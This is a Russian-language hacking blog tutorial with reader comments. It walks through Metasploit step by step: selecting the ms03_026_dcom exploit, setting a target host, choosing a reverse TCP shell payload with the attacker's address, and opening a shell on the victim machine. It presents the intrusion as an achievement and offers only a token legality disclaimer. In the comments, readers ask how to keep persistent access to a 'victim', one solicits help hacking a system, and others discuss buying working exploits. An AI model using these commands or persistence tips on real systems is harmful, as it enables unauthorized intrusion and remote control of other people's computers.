metasploit-vzlom

Metasploit взлом чужого компа

Metasploit взлом цели

В предыдущей статье из серии профессиональных инструментов для взлома, мы загрузили и установили Metasploit. Теперь, мы начнем адаптироваться к Metasploit Framework и будем делать маленькие шаги чтобы инициировать наш первый настоящий взлом.

Прежде чем мы начнем взлом, давайте ознакомимся с программой и с некоторыми терминами, которые мы все должны знать их. При быстром взгляде на Metasploit Framework, он может быть немного непонятным с различными интерфейсами, параметрами, услугами, и модулями. Здесь мы постараемся сделать его более понятным, так чтобы мы смогли выполнить наш первый взлом.

Терминология
Следующая терминология популярна не только в Metasploit Framework, но и во всем мире профессиональных взломщиков и пентестеров, а также и в целях безопасности. По идее все должны быть знакомы с этими терминами чтобы четко понимать их для дальнейшего обучения в этой сфере.

Exploit
Exploit
является средством, с помощью которого хакер использует недостатки или уязвимость в сети, приложения или службы. Хакер может использовать этот недостаток или уязвимость таким образом, что разработчик не подумал что так можно сделать, чтобы достичь желаемого результата (например, корень доступа). Из Некоторых более общих типов взломах вероятно, уже слышали о них являются SQL инъекциями, дос и т.д.

Payload
Payload
является программой или кодом, который поступает в систему цели. Metasploit имеет встроенных средств пайлодов для этой цели, включенных в весьма полезной Meterpreter, или вы можете создать свои собственные. Это предназначено для злоумышленника чтобы он имел возможность управления или манипулирования целевой системой для своих конкретных потребностей.

Shellcode
Это набор инструкций, нужных в качестве пайлоада, когда происходит внедрение в систему. Shellcode, как правило, написан на ассемблере, но не всегда. Она называется «Shellode«, потому что командная оболочка или другая команда консоли предназначена для злоумышленника, которая может быть использована для выполнения команд на компьютере жертвы.

Module

Это кусок программного обеспечения, которой может быть использован в Metasploit Framework. Эти модули являются нанекотором уровне взаимозаменяемыми и дают Metasploit некую уникальную силу. Эти модули могут быть использованны как и вспомогательные модули.

Listener
Этот компонент, который слушает соединения из системы хакера к целевой системе. Listener просто поддерживает нужное соединение между этими двумя системами.

Show
Metasploit Framework имеет сотни модулей и других услуг. В результате, вы не сможете вспомнить их все. К счастью, команда show может показать список всех модулей, параметры, цели и т.д. В своих рамках.

Теперь вы узнали основы Metasploit концепций и его команд, давайте мы взломаем какую-нибудь систему!

Давайте Начнем!


 

Первым делом откройте терминал

Для успешного взлома используйте Unix системы в качестве рабочей машины.

Напишите:

msfconsole

или

msfvenom

metasploit vzlom

Будте терпеливы так как Metasploit очень большой и требует много и системных ресурсов при запуске. Он содержит1000 модулей и250+ пайлодов.

Чтобы узнать какой вирус вам нужен используйте Nmap чтобы от сканировать цель и узнать ее уязвимости. Я написал подробно как использовать Nmap.

В нашем случае я выберу любой вид експлойтов. Для поиска нужного пишем:

msf > search (например dcom) 2

 

Нам показан список вирусов из этой категории. Используем нужный при помощи команды use.
Команда должны выгледить так:


msf > use exploit/windows/dcerpc/ms03_026_dcom

metasploit vzlom

Обратите внимание как все изменилось и теперь он отображает выбранный нами Exploit.

Используйте эту команду чтобы увидеть опции которые используется при выбранном експлоите.

msf > show options

 

metasploit vzlom

Теперь нужно указать цель (set remote host). Используйте IP цели которую вы атакуите. Обрытите внимание на порт который будет использован при атаке.

msf > set RHOST 107.4.3.8(Ip адреес цели)

metasploit vzlom

Теперь нужно посмотреть какие пайлоады доступны для этого експлоита. Для этого пишем:

msf > show payloads

metasploit vzlom

Теперь мы видим список и можем выбрать. Для этого пишем:

msf > set PAYLOAD generic/shell_reverse_tcp

metasploit vzlom

Теперь остался последний шаг. Мы должны сказать программе какой у нас Ip адрес. В случае успеха у нас будет полный контроль над компьютером цели.

msf > set LHOST 105.5.0.7(наш Ip)

metasploit vzlom

Пора запускать все. Пишем:

msf > exploit

metasploit vzlom

Надеюсь все прошло успешно.

Введите команду чтобы открыть cmd в системе XP, которая появится на вашей Metasploit консоли.

sessions –i 1

чтобы убедится что вы действительно в системе пишем:

C:> DIR

Поздравляем! Вы только что успешно взломали систему цели. Наслаждайтесь.

Важное замечание: взлом чужого компьютера без разрешения считается незаконным актом или преступлением в большинстве стран. Мы написали это руководство для целей безопасности!

Мы что-то упустили? Вы знаете как лучше? Вы что-то не поняли?
Пишите в комментариях мы всегда ответим!

Psyhocode
Psyhocode
Взлом это не преступление, Это искусство!
http://psyhocode.com/

29 Коментарии “Metasploit взлом чужого компа

    1. попробуй с локальной сети сначала.. и пофантазируй с помощю социальной инженерии! уверен все работает !

  1. У меня не получилось(
    А как узнать на какие порты, какие эксплоиты и пейлоады использовать? Их ведь огромное количество и наверное некоторые на современных системах уже не проходят.

      1. Hello.
        my name is pouya
        I am Iranian and I live in Iran.
        And I need your help to hack a system, if you can please help me
        I write you my email if you talk to me privately, I thank you I am waiting for you.

        1. If you can help me, I count on you to give me this message privately to talk with you

  2. Очень хороший сайт. Училсо многому. Продолжайте в током же вдухе

  3. нифига не понятно вроде взломал сессия есть подключается уже минут двадцать что мне делать?

      1. Вот ты говоришь из соц. сетей, а поподробнее можно? Их же фиг вытащишь от туда, или ты имеешь в виду с помощь какого нибудь сервиса? к примеру с помощью iploger ?

  4. Народ :)вот подскажите мне как новичку… Взломал я комп ,вроде все хорошо , но возник другой вопрос . Как сделать так, чтобы фал (exe) созданный в metasploit установился в систему жертвы ,чтобы можно было в любо момент подключиться к данной машине (жертвы) ?

    1. msf->set ExitOnSession false — удержит вашу сессию активном и вы сможете заново подключится когда захотите
      msf ->exploit -j

  5. видає помилку :bash: msf: команда не найдена

    1. #вводите в терминале:
      #service postgresql start
      #service metasploit start
      #msfconsole или #msfvenom

      1. Вот только я не понял, что делать с отсканированным портом? Куда его вписывать? Написанно обратить внимание на порт который будет использован при атаке, а где он и что он не сказанно ни слова..

  6. Exploit completed, but no session was created

    все делал в точности, как тут написано, в чем проблема может быть?

    1. Если ещё не разобрался. У меня та же проблема была, попробуй через nmap отсканировать порты, и уже в зависимости от порта выбирай exploit

  7. Все эксплоиты тухлые, все уже заделали дыры когда они появились в метасплоите . В лучшем случае удастся взломать то что не обновлялось как минимум полгода. А свежие работающие эксплоиты продаются за деньги.

      1. В интернете молодой человек в интернете. На пример купить коммерческий метасплоит, там ещё не совсем протухли, только с душком. А на совсем свежак я думаю денег не хватит, да и зачем тебе, всё равно воспользоваться не сможешь. Лучше начни с изучения ассемблера или c/c++ и причем самостоятельно в Российских ВУЗах тебе мало помогут. А вся база эксплоитов на сайте exploit-db.com

Comments are closed.

Сообщить об опечатке

Текст, который будет отправлен нашим редакторам: